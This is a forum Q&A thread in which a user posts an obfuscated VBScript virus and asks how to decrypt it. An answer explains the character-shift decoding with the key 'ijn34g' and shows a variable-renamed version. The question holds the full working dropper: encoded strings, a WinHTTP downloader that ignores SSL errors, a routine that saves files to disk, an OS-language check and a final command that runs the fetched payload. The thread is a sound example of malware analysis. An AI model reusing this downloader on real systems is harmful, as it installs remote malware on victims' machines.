Virus decryption - vbscript

Asked

Viewed 295 times

4

Option Explicit
On Error Resume Next
dim rbs309
dim tadjakmnmfrg4460
dim icsnvk206
dim wsmp1276
dim falkal1610
dim rfqgobyeyrp5319
dim gtxhgi5556
dim mll8810
dim qxat8709
dim hgurgqrv3280
dim baknqdo6857
dim cioslu3564
dim sndohhjq1214
dim lwwfaim8338
dim haprm493
dim iltkfxbb2382
dim dhydlcp7543
dim qpdu6740
dim gtlbowwr6975
dim xcyi8081
dim isfotb6795
dim uguojbssq5199
dim dycbyrmy5608
dim suqmi6111
dim mojspk6072
dim gwjdvxqxpi1867
dim syc9022
dim cwnilskntu6156
dim jycej9917
dim kaumen4761
dim hpml9179
dim stwjmww5737
dim mju2625
dim idmndh94
dim lkrm5932
dim kfdvhjl9992
dim fyv2635
dim njuv4832
dim ygvhoo991
dim twfygbvnne8124
dim kwjktixh825

kwjktixh825         = "ijn34g"
rbs309              = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))
tadjakmnmfrg4460    = uckp9923(fdhtrhou8434(""))
icsnvk206           = uckp9923(fdhtrhou8434("šÝ›—•ÖÕ"))
wsmp1276            = uckp9923(fdhtrhou8434("ÔÜݪ¨Ì·˜â£Ù̽Å"))
falkal1610          = uckp9923(fdhtrhou8434("ÕÖÓ›‡•ÝÚ×¥—ºÀ"))
rfqgobyeyrp5319     = uckp9923(fdhtrhou8434("Õ×â›b—"))
gtxhgi5556          = uckp9923(fdhtrhou8434("ÐÚØa—"))
mll8810             = uckp9923(fdhtrhou8434("¹º¯X"))
qxat8709            = uckp9923(fdhtrhou8434("Ž«Âtx"))
hgurgqrv3280        = uckp9923(fdhtrhou8434("ÏÓÕa¬"))
baknqdo6857         = uckp9923(fdhtrhou8434("ÖËÓ¥¨º—¬²‚x¨"))
cioslu3564          = uckp9923(fdhtrhou8434("ÝÍÓ–¶ÖÏ⦭ºÎÖ×ybÎ×Óâ£Ù̽"))
sndohhjq1214        = uckp9923(fdhtrhou8434("‰ÝS™ßΘ f¦ÝÜÑÓ¥"))
lwwfaim8338         = uckp9923(fdhtrhou8434("ÍÓ"))
haprm493            = uckp9923(fdhtrhou8434("Õ×â›bÊ"))
iltkfxbb2382        = uckp9923(fdhtrhou8434("Õ×â›b"))
dhydlcp7543         = uckp9923(fdhtrhou8434("š˜£a¨ÚÎßߘ†×ÝÞ¶¡¾—Úâ§|ÕÒÁ"))
qpdu6740            = uckp9923(fdhtrhou8434("™˜Ÿb¦ÌÝÞÓš“àÛËÜœ–"))
kfdvhjl9992         = uckp9923(fdhtrhou8434("ÅÍן–ܹÆᥙھƨv"))
fyv2635             = uckp9923(fdhtrhou8434("ÅÝà˜§¼‰ÖÚtÚÐØק¨Ì¼ŠÒ¡•‡ÜÞܘ¡ÜÌÙ²nª"))
njuv4832            = uckp9923(fdhtrhou8434("Åâ"))
twfygbvnne8124      =  1046
buoyc2863           = uckp9923(fdhtrhou8434("½½½ƒ"))


Function fdhtrhou8434(Str)
str = Replace(str,"@","")
fdhtrhou8434 = str
End Function       

Function uckp9923(Str)
 Dim dxjc2225, mpbx3317, lww1640, ogngfnwbr3141, rbtac94, umr8295, iael1408, lbf7910
 rbtac94    = "" 
 dxjc2225   = Len(kwjktixh825)
 mpbx3317   = 1
 lww1640    = Len(Str) 
 str        = StrReverse(str) 

 For ogngfnwbr3141 = lww1640 To 1 Step -1
      umr8295   = asc(Mid(str,ogngfnwbr3141,1))
      iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
      rbtac94   = rbtac94  &  chr(umr8295 - iael1408)
      lbf7910   = 1
      mpbx3317  = mpbx3317+lbf7910
      lbf7910   = 1

      If mpbx3317 > dxjc2225 Then 
        mpbx3317 = lbf7910
      Next
      rbtac94   = StrReverse(rbtac94)
      uckp9923  = rbtac94 
End Function


gtlbowwr6975    = chr(34)
set xcyi8081    = CreateObject(wsmp1276)
Set isfotb6795  = WScript.CreateObject(falkal1610)
dycbyrmy5608    =  xcyi8081.ComputerName
Set mojspk6072  = CreateObject(cioslu3564)

if mojspk6072.FolderExists(kfdvhjl9992) then 
    uguojbssq5199 = kfdvhjl9992  &  Left(dycbyrmy5608, 3)   &   njuv4832
else
    uguojbssq5199 = fyv2635  &  Left(dycbyrmy5608, 3)  &  njuv4832
end if

suqmi6111       = uguojbssq5199   &  Left(dycbyrmy5608, 3)  &  hgurgqrv3280

Function BinaryGetURL(strURL)
  Dim objWinHttp
  Dim lngTimeout
  Dim strMethod
  Dim strPostData
  Dim strUserAgentString
  Dim intSslErrorIgnoreFlags
  Dim blnEnableRedirects
  Dim blnEnableHttpsToHttpRedirects

  lngTimeout                    = 59000
  strMethod                     = "GET"
  strPostData                   = ""
  intSslErrorIgnoreFlags        = 13056
  blnEnableRedirects            = True
  blnEnableHttpsToHttpRedirects = True
  Set objWinHttp                = CreateObject(dhydlcp7543)
  objWinHttp.SetTimeouts lngTimeout, lngTimeout, lngTimeout, lngTimeout
  objWinHttp.Option(0)          = qpdu6740
  objWinHttp.Option(4)          = intSslErrorIgnoreFlags
  objWinHttp.Option(6)          = blnEnableRedirects
  objWinHttp.Option(12)         = blnEnableHttpsToHttpRedirects
  objWinHttp.Open strMethod, strURL, False 
  If strMethod = "buoyc2863" Then
    objWinHttp.setRequestHeader "Content-type", _ "application/x-www-form-urlencoded"
  End If

  objWinHttp.Send  strPostData 
  If (objWinHttp.Status = 200) Then
    BinaryGetURL = objWinHttp.ResponseBody
  End If
  Set objWinHttp = Nothing
End Function

Function SaveBinaryData(arrByteArray, strFN)
dim ryu9878, vocehkn515
ryu9878 = strFN
vocehkn515 = 2
  If VarType(arrByteArray) >= 8192 Then
    Dim objBS
    Set objBS = CreateObject(baknqdo6857)
    with objBS
        .Type = 1 
        .Open()
        .Write(arrByteArray)
        .SaveToFile ryu9878 , vocehkn515
    End With

  End If 
End Function 
 Set stwjmww5737 = GetObject(uckp9923(fdhtrhou8434("›àÛœ—ÃÝÙÝ¥•ÅÆ°™ÛÊØݦ¦ÌÙ××p ÌßϺ¡£ÐÝËÜ¢§ÙÎÚÛœ¯¡ÜÞÛš¡ÕÒá")))
 Set mju2625 = stwjmww5737.ExecQuery(uckp9923(fdhtrhou8434("ÖÏ⦭ºÐØק•ÙÎÚ½’fš×ÓÅS¡ÖÛÐŽ]TÛÌÏÚ˜‡")))
 For Each idmndh94 in mju2625
lkrm5932 = idmndh94.OSlanguage
 Next
mojspk6072.CreateFolder(uguojbssq5199)
If (mojspk6072.FileExists(uguojbssq5199 & lwwfaim8338) = false and twfygbvnne8124 = lkrm5932) Then
Set gwjdvxqxpi1867 = mojspk6072.OpenTextFile(uguojbssq5199 & lwwfaim8338,8,true,false)
gwjdvxqxpi1867.WriteLine icsnvk206
gwjdvxqxpi1867.Close
Do
SaveBinaryData BinaryGetURL(rbs309 & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "k"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "k") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "o" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "o"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "o") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "e" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "e"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "e") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & haprm493), suqmi6111
Loop Until mojspk6072.FileExists(suqmi6111) = true
isfotb6795.run sndohhjq1214 & gtlbowwr6975 & suqmi6111 & gtlbowwr6975 &  " " & tadjakmnmfrg4460
End If

I received a virus made in vbscript and would like to learn to decrypt it. I would like to know what steps or subjects I need to study or research to decrypt this. And if there’s a website or program that does that, I’d appreciate it if you could help me.

cryptography vbs
  • 1

    These things aren’t usually encrypted, they’re just a little scrambled. Usually the function that untangles is next to the code (otherwise it would not even work). It is too long the whole code?

  • @Bacco, I edited. Full code.

  • I stroked over the answer, at least to give the initial path. If there is some time left, maybe I will put more steps in it later. I think since you are already gives a good idea of how to "unlock" the code.

1 answer

8


It’s basically a substitution game. I do not intend to talk about the whole function, otherwise the answer will become immense (I can change my mind later), but follow the main steps to give an idea:

You have known parts, just swap them out until the code is readable.

For example, the function fdhtrhou8434 basically changes @ for nothing, then we can delete it from all lines that does not have @. For example

rbs309 = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))

is the same as

rbs309 = uckp9923("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ")

Function uckp9923, it basically runs the string from end to start, and subtracts the bytes from the string "ijn34g", contained in kwjktixh825

  umr8295   = asc(Mid(str,ogngfnwbr3141,1))
  iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
  rbtac94   = rbtac94  &  chr(umr8295 - iael1408)

If you apply this to the shuffled variables, you will get a series of readable strings.

These strings will show you where the function is from Function BinaryGetURL(strURL) will download some code, which can be malware, for example, and record the same on your hard drive using the function SaveBinaryData.

The code is merely overshadowed, only to give work and its intention is not visible at first read, but is typical technique of script kiddies basically.

Just see how much more normal the code looks changing only a few name variables, which can be done easily with a "search and replace" of any code editor:

Function uckp9923(Str)
 resultado      = "" 
 tamanhoChave   = Len( chave )
 iChave         = 1
 tamanhoEntrada = Len(Str) 
 str            = StrReverse(Str) 

 For i = tamanhoEntrada To 1 Step -1
    letraEntrada = Asc( Mid( Str, i, 1 ) )
    letraChave   = Asc( Mid( chave, iChave, 1))
    resultado    = resultado&  chr(letraEntrada - letraChave)
    um = 1
    iChave = iChave + um
    um = 1

    If iChave > tamanhoChave Then 
      iChave = um
    Next
    resultado = StrReverse(resultado)
    uckp9923  = resultado
End Function

It’s exactly the same function, I just changed the name of the variables to make it easier to read.

  • Thank you very much for your reply. You have given me a good idea. I appreciate your help. I will study this code better. And if you can describe your steps better until you get this result I thank you even more. Hug!

Browser other questions tagged cryptography vbs

You are not signed in. Login or sign up in order to post.